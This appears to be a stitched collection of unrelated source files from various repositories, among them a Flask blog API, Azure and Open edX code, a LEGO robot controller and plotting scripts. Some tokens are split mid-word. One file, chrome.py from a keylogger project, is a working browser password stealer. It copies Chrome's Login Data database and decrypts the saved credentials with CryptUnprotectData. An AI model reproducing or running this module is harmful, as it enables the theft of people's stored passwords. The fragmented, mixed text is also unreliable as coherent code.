"""Private class *_Interval* inherits from *_ConfigBus* and provides functions to manipulate the interval.
"""
def read(self):
"""Public function *read* reads and returns the interval value.
:return: *int*
"""
conf = self._read()
value = [c for c in conf if c.strip('\n')[:8] == 'interval'][0].split(' ')[-1:][0].strip('\n')
return int(value)
def write(self, value):
"""Public function *write* writes the passed interval value into eems.conf file.
:param value: *int*
:return: *None*
"""
conf = self._read()
conf_new = ''
line = [c for c in conf if c.strip('\n')[:8] == 'interval'][0]
for x in range(len(conf)):
if conf[x] == line:
conf_new += 'interval {}\n'.format(value)
else:
conf_new += conf[x]
self._write(conf_new)
class _Monitoring(__ConfigBus):
"""Private class *_Monitoring* inherits
|
from *_ConfigBus* and provides functions to manipulate the monitoring flag.
"""
def read(self):
"""Public function *read* reads and returns the monitor
|
ing flag.
:return: *bool*
"""
conf = self._read()
value = [c for c in conf if c.strip('\n')[:10] == 'monitoring'][0].split(' ')[-1:][0].strip('\n')
return bool(value)
def write(self, value):
"""Public function *write* writes the monitoring flag into eems.conf file.
:param value: *bool* / *int*
:return: *None*
"""
conf = self._read()
conf_new = ''
line = [c for c in conf if c.strip('\n')[:10] == 'monitoring'][0]
for x in range(len(conf)):
if conf[x] == line:
conf_new += 'monitoring {}\n'.format(int(value))
else:
conf_new += conf[x]
self._write(conf_new)
class Config(object):
def __init__(self):
self.interval = _Interval()
self.monitoring = _Monitoring()
Config = Config()
|
jorik041/shmoocon_2014_talk
|
caravan/caravan/dashboards/infrastructure/workers/tables.py
|
Python
|
bsd-2-clause
| 977
| 0
|
from horizon import tables
from tasa.store import connection
class RestartWorker(tables.Action):
name = 'restart'
verbose_name = 'Restart Worker'
data_type_singular = 'Worker'
action_present = 'restart'
requires_input = False
classes = ('btn-warning',)
def handle(self, data_table, request, object_ids):
# Send a restart signal
connection.publish('control', 'restart')
class WorkerTable(tables.DataTable):
name = tables.Column('name', verbose_name='Name')
addr = tables.Column('address', verbose_name='Address')
port = tables.Column('port')
age = tables.Column('age')
idle = tables.Column('idle')
flags = tables.Column('flags')
cmd = tables.Column('cmd', verbose_name='Last Command')
def get_object_id(self, datum):
return
|
datum['add
|
r']
class Meta:
name = 'workers'
verbose_name = 'Connections'
table_actions = (RestartWorker,)
multi_select = False
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2016_12_01/models/flow_log_information_py3.py
|
Python
|
mit
| 2,020
| 0.00099
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FlowLogInformation(Model):
"""Information on the configuration of flow log.
All required parameters must be populated in order to send to Azure.
:param target_resource_id: Required. The ID of the resource to configure
for flow logging.
:type target_resource_id: str
:param storage_id: Required. ID of the storage account which is used to
store the flow log.
:type storage_id: str
:param enabled: Required. Flag to enable/disable flow logging.
:type enabled: bool
:param retention_policy:
:type retention_p
|
olicy:
~azure.mgmt.network.v20
|
16_12_01.models.RetentionPolicyParameters
"""
_validation = {
'target_resource_id': {'required': True},
'storage_id': {'required': True},
'enabled': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'storage_id': {'key': 'properties.storageId', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'retention_policy': {'key': 'properties.retentionPolicy', 'type': 'RetentionPolicyParameters'},
}
def __init__(self, *, target_resource_id: str, storage_id: str, enabled: bool, retention_policy=None, **kwargs) -> None:
super(FlowLogInformation, self).__init__(**kwargs)
self.target_resource_id = target_resource_id
self.storage_id = storage_id
self.enabled = enabled
self.retention_policy = retention_policy
|
stiletto/bnw
|
bnw_shell.py
|
Python
|
bsd-2-clause
| 122
| 0.016393
|
#!/usr
|
/bin/env python
import os.path as path
import sys
root=path.abspath(path.dirname(__file__))
sy
|
s.path.insert(0,root)
|
mehulj94/Radium-Keylogger
|
Recoveries/chrome.py
|
Python
|
apache-2.0
| 2,142
| 0.010271
|
import sqlite3
import shutil
import win32crypt
import sys, os, platform
class Chrome():
def __init__(self):
pass
def run(self):
database_path = ''
if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
# For Win7
path_Win7 = os.
|
environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') +
|
'\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'
# For XP
path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
if os.path.exists(path_XP):
database_path = path_XP
elif os.path.exists(path_Win7):
database_path = path_Win7
else:
return
else:
return
# Copy database before to query it (bypass lock errors)
try:
shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
database_path = os.getcwd() + os.sep + 'tmp_db'
except Exception, e:
pass
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception, e:
return
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except:
return
pwdFound = []
for result in cursor.fetchall():
values = {}
try:
# Decrypt the Password
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
except Exception, e:
password = ''
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
conn.close()
if database_path.endswith('tmp_db'):
os.remove(database_path)
return pwdFound
#tem = Chrome()
#a = tem.run()
#print a
|
antoviaque/edx-platform
|
lms/djangoapps/course_api/blocks/tests/test_api.py
|
Python
|
agpl-3.0
| 2,533
| 0.003158
|
"""
Tests for Blocks api.py
"""
from django.test.client import RequestFactory
from course_blocks.tests.helpers import EnableTransformerRegistryMixin
from student.tests.factories import UserFactory
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import SampleCourseFactory
from ..api import get_blocks
class TestGetBlocks(EnableTransformerRegistryMixin, SharedModuleStoreTestCase):
"""
Tests for the get_blocks function
"""
@classmethod
def setUpClass(cls):
super(TestGetBlocks, cls).setUpClass()
cls.course = SampleCourseFactory.create()
# hide the html block
cls.html_block = cls.store.get_item(cls.course.id.make_usage_key('html', 'html_x1a_1'))
cls.html_block.visible_to_staff_only = True
cls.store.update_item(cls.html_block, ModuleStoreEnum.UserID.test)
def setUp(self):
super(TestGetBlocks, self).setUp()
self.user = UserFactory.create()
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
def test_basic(self):
blocks = get_blocks(self.request, self.course.location, self.user)
self.assertEquals(blocks['root'], unicode(self.course.location))
# subtract for (1) the orphaned course About block and (2) the hidden Html block
self.assertEquals(len(blocks['blocks']
|
), len(self.store.get_items(self.course.id)) - 2)
self.assertNotIn(unicode(self.html_block.location), blocks['blocks'])
def test_no_user(self):
blocks = get_blocks(self.request, self.course.location)
|
self.assertIn(unicode(self.html_block.location), blocks['blocks'])
def test_access_before_api_transformer_order(self):
"""
Tests the order of transformers: access checks are made before the api
transformer is applied.
"""
blocks = get_blocks(self.request, self.course.location, self.user, nav_depth=5, requested_fields=['nav_depth'])
vertical_block = self.store.get_item(self.course.id.make_usage_key('vertical', 'vertical_x1a'))
problem_block = self.store.get_item(self.course.id.make_usage_key('problem', 'problem_x1a_1'))
vertical_descendants = blocks['blocks'][unicode(vertical_block.location)]['descendants']
self.assertIn(unicode(problem_block.location), vertical_descendants)
self.assertNotIn(unicode(self.html_block.location), vertical_descendants)
|
feedhq/feedhq
|
feedhq/feeds/management/commands/sync_scheduler.py
|
Python
|
bsd-3-clause
| 1,310
| 0
|
import structlog
from more_itertools import chunked
from rache import delete_job, scheduled_jobs
from . import SentryCommand
from ...models import UniqueFeed
from ....utils import get_redis_connection
logger = structlog.get_logger(__name__)
class Command(SentryCommand):
"""Syncs the UniqueFeeds and the scheduler:
- removes scheduled feeds which are missing from uniquefeeds
- adds missing uniquefeeds to the scheduler
"""
def handle_sentry(self, *args, **kwargs):
connection = get_redis_connection()
existing_jobs = set(scheduled_jobs(connection=connection))
target = set(UniqueFeed.objects.filter(muted=False).values_list(
'url', flat=True))
to_delete = existing_jobs - target
if to_delete:
logger.info("deleting jobs from the scheduler",
count=len(to_delete))
|
for job_id in
|
to_delete:
delete_job(job_id, connection=connection)
to_add = target - existing_jobs
if to_add:
logger.info("adding jobs to the scheduler", count=len(to_add))
for chunk in chunked(to_add, 10000):
uniques = UniqueFeed.objects.filter(url__in=chunk)
for unique in uniques:
unique.schedule()
|
autorealm/MayoiNeko
|
develop/apis.py
|
Python
|
apache-2.0
| 9,771
| 0.005366
|
# coding: utf-8
import re, time, hashlib, logging, json, functools
from leancloud import Object
from leancloud import User
from leancloud import Query
from leancloud import LeanCloudError
from flask import request
from flask import make_response
from flask import session
from develop.models import Blog, Comments, Page, Err
_COOKIE_NAME = 'mayoineko_skey'
_COOKIE_KEY = 'Nikora'
def _current_path():
return os.path.abspath('.')
def _now():
return datetime.now().strftime('%y-%m-%d_%H.%M.%S')
def _dump(obj):
if isinstance(obj, list):
objs = []
for o in obj:
objs.append(_dump(o))
return objs
if isinstance(obj, Page):
return {
'page_index': obj.page_index,
'page_count': obj.page_count,
'item_count': obj.item_count,
'has_next': obj.has_next,
'has_previous': obj.has_previous
}
if isinstance(obj, Blog):
return {
'id': obj.id,
'name': obj.get('name'),
'sum
|
mary': obj.get('summary'),
'content': obj.get('content'),
#'user_name': obj.get('user').get('username'),
'created_at': str(obj.crea
|
ted_at)
}
if isinstance(obj, Comments):
return {
'id': obj.id,
#'user_name': obj.get('user').get('username'),
'content': obj.get('content'),
'created_at': str(obj.created_at)
}
if isinstance(obj, User):
return {
'id': obj.id,
'username': obj.get('username'),
'password': obj.get('password'),
'email': obj.get('email')
}
raise TypeError('%s is not JSON serializable' % obj)
def dumps(obj):
return json.dumps(obj, default=_dump)
def api(func):
@functools.wraps(func)
def _wrapper(*args, **kw):
try:
r = dumps(func(*args, **kw))
except Err, e:
r = json.dumps(dict(error=e.error, data=e.data, message=e.message))
except Exception, e:
logging.exception(e)
r = json.dumps(dict(error='internalerror', data=e.__class__.__name__, message=e.message))
make_response().headers['content-type'] = 'application/json'
return r
return _wrapper
def make_signed_cookie(id, password, max_age):
# build cookie string by: id-expires-md5
expires = str(int(time.time() + (max_age or 86400)))
L = [id, expires, hashlib.md5('%s-%s-%s-%s' % (id, password, expires, _COOKIE_KEY)).hexdigest()]
return '-'.join(L)
def parse_signed_cookie(cookie_str):
try:
L = cookie_str.split('-')
if len(L) != 3:
return None
id, expires, md5 = L
if int(expires) < time.time():
return None
user = User().get(id)
if user is None:
return None
if md5 != hashlib.md5('%s-%s-%s-%s' % (id, user.password, expires, _COOKIE_KEY)).hexdigest():
return None
return user
except:
return None
def check_login():
cookie = request.cookies.get(_COOKIE_NAME)
if cookie:
user = parse_signed_cookie(cookie)
else:
user = None;
if user is None:
if _COOKIE_NAME in session:
user = parse_signed_cookie(session[_COOKIE_NAME])
return user;
@api
def sign_in(username, password, remember='false'):
try:
User().login(username, password)
user = Query(User).equal_to("username", username).first()
except LeanCloudError, e:
raise e
max_age = 604800 if remember=='true' else None
cookie = make_signed_cookie(user.id, user.get('password'), max_age)
response = make_response();
response.set_cookie(_COOKIE_NAME, cookie, max_age=max_age)
session.permanent = False
session[_COOKIE_NAME] = cookie
return user
_RE_EMAIL = re.compile(r'^[a-z0-9\.\-\_]+\@[a-z0-9\-\_]+(\.[a-z0-9\-\_]+){1,4}$')
_RE_MD5 = re.compile(r'^[0-9a-f]{32}$')
@api
def sign_up(username, password, email):
email = email.strip().lower()
if not email or not _RE_EMAIL.match(email):
raise Err('value:invalid', 'email', 'email cannot be empty.')
user = User()
user.set("username", username)
user.set("password", password)
user.set("email", email)
try:
user.sign_up()
except LeanCloudError, e:
raise e
return user
def sign_out():
make_response().set_cookie(_COOKIE_NAME, None)
session.pop(_COOKIE_NAME, None)
@api
def list_users():
page_index = 1
page_size = 26
page = None
users = []
try:
page_index = int(request.args.get('page', '1'))
except ValueError:
pass
try:
total = Query(User).count();
page = Page(total, page_index, page_size)
users = Query(User).descending('createdAt').skip(page.offset).limit(page.page_size).find()
except LeanCloudError, e:
if e.code == 101: # 服务端对应的 Class 还没创建
users = []
else:
raise e
return dict(users=users, page=page)
@api
def get_user(user_id):
user = Query(User).get(user_id)
if user:
return user
raise Err('value:notfound', 'user', 'user not found.')
@api
def list_blogs():
format = request.args.get('format', '')
page_index = 1
page_size = 26
page = None
blogs = []
try:
page_index = int(request.args.get('page', '1'))
except ValueError:
pass
try:
total = Query(Blog).count();
page = Page(total, page_index, page_size)
blogs = Query(Blog).descending('createdAt').skip(page.offset).limit(page.page_size).find()
except LeanCloudError, e:
if e.code == 101: # 服务端对应的 Class 还没创建
blogs = []
else:
raise e
#logging.debug(blogs)
if format=='html':
for blog in blogs:
blog.content = markdown2.markdown(blog.content)
return dict(blogs=blogs, page=page)
@api
def get_blog(blog_id):
blog = Query(Blog).get(blog_id)
if blog:
return blog
raise Err('value:notfound', 'blog', 'blog not found.')
@api
def update_blog(blog_id, name='', summary='', content=''):
name = name.strip()
summary = summary.strip()
content = content.strip()
if not name:
raise Err('value:invalid', 'name', 'name cannot be empty.')
if not summary:
raise Err('value:invalid', 'summary', 'summary cannot be empty.')
if not content:
raise Err('value:invalid', 'content', 'content cannot be empty.')
user = check_login()
#if user is None:
#raise Err('value:notfound', 'user', 'user not found.')
blog = None
try:
blog = Query(Blog).get(blog_id)
except LeanCloudError, e:
pass
try:
if blog is None:
blog = Blog(name=name, summary=summary, content=content, user=user)
else:
blog.set('name', name)
blog.set('summary', summary)
blog.set('content', content)
blog.save()
except LeanCloudError, e:
raise e
return blog
@api
def delete_blog(blog_id):
blog = Query(Blog).get(blog_id)
if blog is None:
raise Err('value:notfound', 'blog', 'blog not found.')
blog.destroy()
return blog
@api
def comment(blog_id, content=''):
user = check_login()
if user is None:
raise Err('value:notfound', 'user', 'user not found.')
content = content.strip()
if not content:
raise Err('value:invalid', 'content', 'content cannot be empty.')
try:
blog = Query(Blog).get(blog_id)
comment = Comment(blog=blog, user=user, content=content)
comment.save()
except LeanCloudError, e:
raise e
return comment
@api
def get_comments(blog_id):
blog = None
comments = None
user = None
try:
blog = Query(Blog).equal_to("objectId", blog_id).first()
if blog is None:
raise Err('value:notfound', 'blog', 'blog not found.')
try:
comments = Query(Comments).equal_to("blog", blog).descending('createdAt').find()
except LeanCloudError, e:
pass
except LeanCloudError, e:
|
jminyu/PatternRecognition_library
|
Data_generation.py
|
Python
|
gpl-3.0
| 2,150
| 0.012093
|
__author__ = 'Schmidtz'
import matplotlib
import numpy as np
import matplotlib.cm as cm
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
from numpy import matlib
from numpy import *
from numpy.random import *
import pylab as p
import math
from scipy import stats, mgrid, c_, reshape, random, rot90, linalg
from Prob_function import *
def genData(Ndat):
c1 = 0.5
r1 = 0.4
r2 = 0.3
# generate enough data to filter
N = 20*Ndat
X = array(random_sample(N))
Y = array(random_sample(N))
X1 = X[(X-
|
c1)*(X-c1) + (Y-c1)*(Y-c1) < r1*r1]
|
Y1 = Y[(X-c1)*(X-c1) + (Y-c1)*(Y-c1) < r1*r1]
X2 = X1[(X1-c1)*(X1-c1) + (Y1-c1)*(Y1-c1) > r2*r2]
Y2 = Y1[(X1-c1)*(X1-c1) + (Y1-c1)*(Y1-c1) > r2*r2]
X3 = X2[ abs(X2-Y2)>0.05 ]
Y3 = Y2[ abs(X2-Y2)>0.05 ]
#X3 = X2[ X2-Y2>0.15 ]
#Y3 = Y2[ X2-Y2>0.15]
X4=zeros(Ndat, dtype=float32)
Y4=zeros(Ndat, dtype=float32)
for i in xrange(Ndat):
if (X3[i]-Y3[i]) >0.05:
X4[i] = X3[i] + 0.08
Y4[i] = Y3[i] + 0.18
else:
X4[i] = X3[i] - 0.08
Y4[i] = Y3[i] - 0.18
print "X", size(X3[0:Ndat]), "Y", size(Y3)
return(vstack((X4[0:Ndat],Y4[0:Ndat])))
if __name__ == "__main__":
random.seed(12345)
dat = genData(500)
print dat.shape
plt.figure(1)
plt.plot(dat[0,:],dat[1,:],'b.')
sigma_x, mu_x = shoot(dat[0,:])
sigma_y, mu_y = shoot(dat[1,:])
matplotlib.rcParams['xtick.direction'] = 'out'
matplotlib.rcParams['ytick.direction'] = 'out'
delta = 0.025
X, Y = np.meshgrid(dat[0,:],dat[1,:])
G = mlab.bivariate_normal(X, Y, sigma_x, sigma_y, mu_x, mu_y)
# Create a simple contour plot with labels using default colors. The
# inline argument to clabel will control whether the labels are draw
# over the line segments of the contour, removing the lines beneath
# the label
CS = plt.contour(X, Y, G)
plt.title('Simplest default with labels')
plt.show()
|
KMPSUJ/lego_robot
|
pilot.py
|
Python
|
mit
| 4,781
| 0.001884
|
# -*- coding: utf-8 -*-
from modules import Robot
import time
r = Robot.Robot()
state = [0, 1000, 1500]
(run, move, write) = range(3)
i = run
slowdown = 1
flag_A = 0
flag_C = 0
lock = [0, 0, 0, 0]
while(True):
a = r.Read()
for it in range(len(lock)):
if lock[it]:
lock[it] = lock[it] - 1
if a[0]: # kontrolka ciągła
flag_A = 0
flag_C = 0
if a[0] == 1 or a[0] == 5 or a[0] == 6:
r.A.run_forever(r.S/slowdown)
elif a[0] == 2 or a[0] == 7 or a[0] == 8:
r.A.run_forever(-r.S/slowdown)
else:
r.A.stop()
if a[0] == 3 or a[0] == 5 or a[0] == 7:
r.C.run_forever(r.S/slowdown)
elif a[0] == 4 or a[0] == 6 or a[0] == 8:
r.C.run_forever(-r.S/slowdown)
else:
r.C.stop()
elif a[1] and not lock[1]: # kontrolka lewa: dyskretna
if a[1] == 1 and i is not run: # kontrolka prawa: ciągła
r.changestate(state[i]-state[i-1])
i = i-1
time.sleep(0.5) # (state[i]-state[i-1])/r.S
if i is run:
slowdown = 1
elif a[1] == 2 and i is not write:
r.changestate(state[i]-state[i+1])
i = i+1
slowdown = 5
time.sleep(0.5) # (state[i+1]-state[i])/r.S
elif a[1] == 3:
r.B.run_forever(r.S)
elif a[1] == 4:
r.B.run_forever(-r.S)
elif a[1] == 9:
r.B.stop()
else:
pass
elif a[2]: # kontrolka one-klick
if a[2] == 1 or a[2] == 5 or a[2] == 6: # stop na 9 (beacon)
if flag_A == -1:
r.A.stop()
flag_A = 0
lock[0] = 30 # lock = 30
elif not lock[0]:
r.A.run_forever(r.S/slowdown)
flag_A = 1
elif a[2] == 2 or a[2] == 7 or a[2] == 8:
if flag_A == 1:
r.A.stop()
flag_A = 0
lock[1] = 30 # lock = 30
elif not lock[1]:
r.A.run_forever(-r.S/slowdown)
flag_A = -1
if a[2] == 3 or a[2] == 5 or a[2] == 7:
if flag_C == -1:
r.C.stop()
flag_C = 0
lock[2] = 30 # lock = 30
elif not lock[2]:
r.C.run_forever(r.S/slowdown)
flag_C = 1
elif a[2] == 4 or a[2] == 6 or a[2] == 8:
if flag_C == 1:
r.C.stop
flag_C = 0
lock[3] = 30 # lock = 30
elif not lock[3]:
r.C.run_forever(-r.S/slowdown)
flag_C = -1
if a[2] == 9:
r.stop()
flag_A = 0
flag_C = 0
elif a[3]: # alternatywna one-klick
if a[3] == 1: # 1 przycisk - oba silniki
if flag_A == -1 and flag_C == -1:
r.stop()
flag_A = 0
flag_C = 0
lock[0] = 30 # lock = 30
elif not lock[0]:
r.run(r.S/slowdown, r.S/slowdown)
flag_A = 1
flag_C = 1
elif a[3] == 2:
if flag_A == 1 and flag_C == 1:
r.stop()
flag_A = 0
flag_C = 0
lock[1] = 30 # lock = 30
elif not lock[1]:
r.run(-r.S/slowdown, -r.S/slowdown)
flag_A = -1
flag_C = -1
elif a[3] == 3:
if flag_A == 1 and flag_C == -1:
r.stop()
flag_A = 0
flag_C = 0
lock[2] = 30
|
# lock = 30
elif not lock[2]:
r.run(-r.S/slowdown, r.S/slowdown)
flag_A = -1
flag_C = 1
elif a[3] == 4:
if flag_A == -1 and flag_C == 1:
r.stop()
flag_A = 0
|
flag_C = 0
lock[3] = 30 # lock = 30
elif not lock[3]:
r.run(r.S/slowdown, -r.S/slowdown)
flag_A = 1
flag_C = -1
elif a[3] == 9:
r.stop()
flag_A = 0
flag_C = 0
else:
if not flag_A:
r.A.stop()
if not flag_C:
r.C.stop()
|
gviejo/ThalamusPhysio
|
python/figure_talk/main_talk_7_corr.py
|
Python
|
gpl-3.0
| 14,903
| 0.034825
|
import numpy as np
import pandas as pd
# from matplotlib.pyplot import plot,show,draw
import scipy.io
import sys
sys.path.append("../")
from functions import *
from pylab import *
from sklearn.decomposition import PCA
import _pickle as cPickle
import matplotlib.cm as cm
import os
###############################################################################################################
# TO LOAD
###############################################################################################################
store = pd.HDFStore("../../figures/figures_articles_v2/figure6/determinant_corr.h5", 'r')
det_all = store['det_all']
shufflings = store['shufflings']
shuffl_shank = store['shuffling_shank']
store.close()
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
# WHICH NEURONS
space = pd.read_hdf("../../figures/figures_articles_v2/figure1/space.hdf5")
burst = pd.HDFStore("/mnt/DataGuillaume/MergedData/BURSTINESS.h5")['w']
burst = burst.loc[space.index]
hd_index = space.index.values[space['hd'] == 1]
# neurontoplot = [np.intersect1d(hd_index, space.index.values[space['cluster'] == 1])[0],
# burst.loc[space.index.values[space['cluster'] == 0]].sort_values('sws').index[3],
# burst.sort_values('sws').index.values[-20]]
firing_rate = pd.read_hdf("/mnt/DataGuillaume/MergedData/FIRING_RATE_ALL.h5")
fr_index = firing_rate.index.values[((firing_rate >= 1.0).sum(1) == 3).values]
# SWR MODULATION
swr_mod, swr_ses = loadSWRMod('/mnt/DataGuillaume/MergedData/SWR_THAL_corr.pickle', datasets, return_index=True)
nbins = 400
binsize = 5
times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2
swr = pd.DataFrame( columns = swr_ses,
index = times,
data = gaussFilt(swr_mod, (5,)).transpose())
swr = swr.loc[-500:500]
# AUTOCORR FAST
store_autocorr = pd.HDFStore("/mnt/DataGuillaume/MergedData/AUTOCORR_ALL.h5")
autocorr_wak = store_autocorr['wake'].loc[0.5:]
autocorr_rem = store_autocorr['rem'].loc[0.5:]
autocorr_sws = store_autocorr['sws'].loc[0.5:]
autocorr_wak = autocorr_wak.rolling(window = 20, win_type = 'gaussian', center = True, min_periods = 1).mean(std = 3.0)
autocorr_rem = autocorr_rem.rolling(window = 20, win_type = 'gaussian', center = True, min_periods = 1).mean(std = 3.0)
autocorr_sws = autocorr_sws.rolling(window = 20, win_type = 'gaussian', center = True, min_periods = 1).mean(std = 3.0)
autocorr_wak = autocorr_wak[2:20]
autocorr_rem = autocorr_rem[2:20]
autocorr_sws = autocorr_sws[2:20]
neurons = np.intersect1d(swr.dropna(1).columns.values, autocorr_sws.dropna(1).columns.values)
neurons = np.intersect1d(neurons, fr_index)
X = np.copy(swr[neurons].values.T)
Y = np.copy(np.vstack((autocorr_wak[neurons].values,autocorr_rem[neurons].values, autocorr_sws[neurons].values))).T
Y = Y - Y.mean(1)[:,np.newaxis]
Y = Y / Y.std(1)[:,np.newaxis]
pca_swr = PCA(n_components=10).fit(X)
pca_aut = PCA(n_components=10).fit(Y)
pc_swr = pca_swr.transform(X)
pc_aut = pca_aut.transform(Y)
All = np.hstack((pc_swr, pc_aut))
corr = np.corrcoef(All.T)
#shuffle
Xs = np.copy(X)
Ys = np.copy(Y)
np.random.shuffle(Xs)
np.random.shuffle(Ys)
pc_swr_sh = PCA(n_components=10).fit_transform(Xs)
pc_aut_sh = PCA(n_components=10).fit_transform(Ys)
Alls = np.hstack((pc_swr_sh, pc_aut_sh))
corrsh = np.corrcoef(Alls.T)
###############################################################################################################
# PLOT
###############################################################################################################
def figsize(scale):
fig_width_pt = 483.69687 # Get this from LaTeX using \the\textwidth
inches_per_pt = 1.0/72.27 # Convert pt to inch
golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)
fig_width = fig_width_pt*inches_per_pt*scale # width in inches
fig_height = fig_width*golden_mean # height in inches
fig_size = [fig_width,fig_height]
return fig_size
def simpleaxis(ax):
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# ax.xaxis.set_tick_params(size=6)
# ax.yaxis.set_tick_params(size=6)
def noaxis(ax):
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.set_xticks([])
ax.set_yticks([])
# ax.xaxis.set_tick_params(size=6)
# ax.yaxis.set_tick_params(size=6)
import matplotlib as mpl
from mpl_toolkits.axes_grid1 import make_axes_locatable
# mpl.use("pdf")
pdf_with_latex = { # setup matplotlib to use latex for output
"pgf.texsystem": "pdflatex", # change this if using xetex or lautex
# "text.usetex": True, # use LaTeX to write all text
# "font.family": "serif",
"font.serif": [], # blank entries should cause plots to inherit fonts from the document
"font.sans-serif": [],
"font.monospace": [],
"axes.labelsize": 16, # LaTeX default is 10pt font.
"font.size": 16,
"legend.fontsize": 16, # Make the legend/label fonts a little smaller
"xtick.labelsize": 16,
"ytick.labelsize": 16,
"pgf.preamble": [
r"\usepackage[utf8x]{inputenc}", # use utf8 fonts becasue your computer can handle it :)
r"\usepackage[T1]{fontenc}", # plots will be generated using this preamble
],
"lines.markeredgewidth" : 0.2,
"axes.linewidth" : 2,
"ytick.major.size" : 3,
"xtick.major.size" : 3
}
mpl.rcParams.update(pdf_with_latex)
import matplotlib.gridspec as gridspec
from matplotlib.pyplot import *
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
import matplotlib.cm as cmx
import matplotlib.colors as colors
# colors = ['#444b6e', '#708b75', '#9ab87a']
fig = figure(figsize = figsize(2.0))
gs = gridspec.GridSpec(2,3, wspace = 0.3, hspace = 0.4, width_ratios = [1,0.8,1], height_ratios = [1,0.9])
#########################################################################
# A. Examples shank
#########################################################################
# see main_search_examples_fig3.py
# neurons_to_plot = ['Mouse17-130207_39', 'Mouse17-130207_43', 'Mouse17-130207_37']
neurons_to_plot = ['Mouse17-130207_42', 'Mouse17-130207_37']
neuron_seed = 'Mouse17-130207_43'
titles = ['Wake', 'REM', 'NREM']
# colors = ['#384d48', '#7a9b76', '#6e7271']
# cNorm = colors.Normalize(vmin=0, vmax = 1)
# scalarMap = cmx.ScalarMappable(norm=cNorm, cmap = viridis)
# color1 = scalarMap.to_rgba(1)
# color2 = 'crimson'
# color1 = 'steelblue'
# color3 = 'darkgrey'
# color1 = '#003049'
# color2 = '#d62828'
# color3 = '#fcbf49'
# color1 = 'blue'
# color2 = 'darkgrey'
# color3 = 'red'
cmap = get_cmap('tab10')
color1 = cmap(0)
color2 = cmap(1)
color3 = cmap(2)
colors = [color1, color3]
color_ex = [color1, color2, color3]
# axG = subplot(gs[2,:])
axA = s
|
ubplot(gs[0,:])
noaxis(axA)
gsA = gridspec.GridSpecFromSubplotSpec(1,3,subplot_spec=gs[0,:],width_ratios=[0.6,0.6,0.6], hspace = 0.2, wspace = 0.2)#, height_ratios = [1,1,0.2,1])
new_path = data_directory+neuron_seed.split('-')[0]+'/'+neuron_seed.split("_")[0]
meanWaveF = scipy.io.loadmat(new_path+'/Analysis/SpikeWaveF.mat')['meanWaveF'][0]
lw =
|
3
# WAWEFORMS
gswave = gridspec.GridSpecFromSubplotSpec(1,3,subplot_spec = gsA[0,1])#, wspace = 0.3, hspace = 0.6)
axmiddle = subplot(gswave[:,1])
noaxis(gca())
for c in range(8):
plot(meanWaveF[int(neuron_seed.split('_')[1])][c]+c*200, color = color2, linewidth = lw)
title("Mean waveforms (a.u.)", fontsize = 16)
idx = [0,2]
for i, n in enumerate(neurons_to_plot):
axchan = subplot(gswave[:,idx[i]])
noaxis(axchan)
for c in range(8):
plot(meanWaveF[int(n.split('_')[1])][c]+c*200, color = colors[i], linewidth = lw)
# # ylabel("Channels")
# if i == 0:
# gca().text(-0.4, 1.06, "b", transform = gca().transAxes, fontsize = 16, fontweight='bold')
cax = inset_axes(axmiddle, "100%", "5%",
|
juposocial/jupo
|
src/lib/url.py
|
Python
|
agpl-3.0
| 2,529
| 0.016607
|
#! coding: utf-8
import re
from urllib import quote
from urlparse import urlsplit, urlunsplit
TRAILING_PUNCTUATION = ['.', ',', ':', ';', '.)']
WRAPPING_PUNCTUATION = [('(', ')'), ('<', '>'), ('[', ']'), ('<', '>')]
unquoted_percents_re = re.compile(r'%(?![0-9A-Fa-f]{2})')
word_split_re = re.compile(r'(\s+)')
simple_url_re = re.compile(r'^https?://\[?\w', re.IGNOR
|
ECASE)
simple_url_2_re = re.compile(r'^www\.|^(?!http)\w[^@]+\.(com|edu|gov|int|mil|net|org)$', re.IGNORECASE)
def sm
|
art_urlquote(url):
"Quotes a URL if it isn't already quoted."
# Handle IDN before quoting.
try:
scheme, netloc, path, query, fragment = urlsplit(url)
try:
netloc = netloc.encode('idna').decode('ascii') # IDN -> ACE
except UnicodeError: # invalid domain part
pass
else:
url = urlunsplit((scheme, netloc, path, query, fragment))
except ValueError:
# invalid IPv6 URL (normally square brackets in hostname part).
pass
# An URL is considered unquoted if it contains no % characters or
# contains a % not followed by two hexadecimal digits. See #9655.
if '%' not in url or unquoted_percents_re.search(url):
# See http://bugs.python.org/issue2637
url = quote(url, safe=b'!*\'();:@&=+$,/?#[]~')
return url
def extract_urls(text):
"""
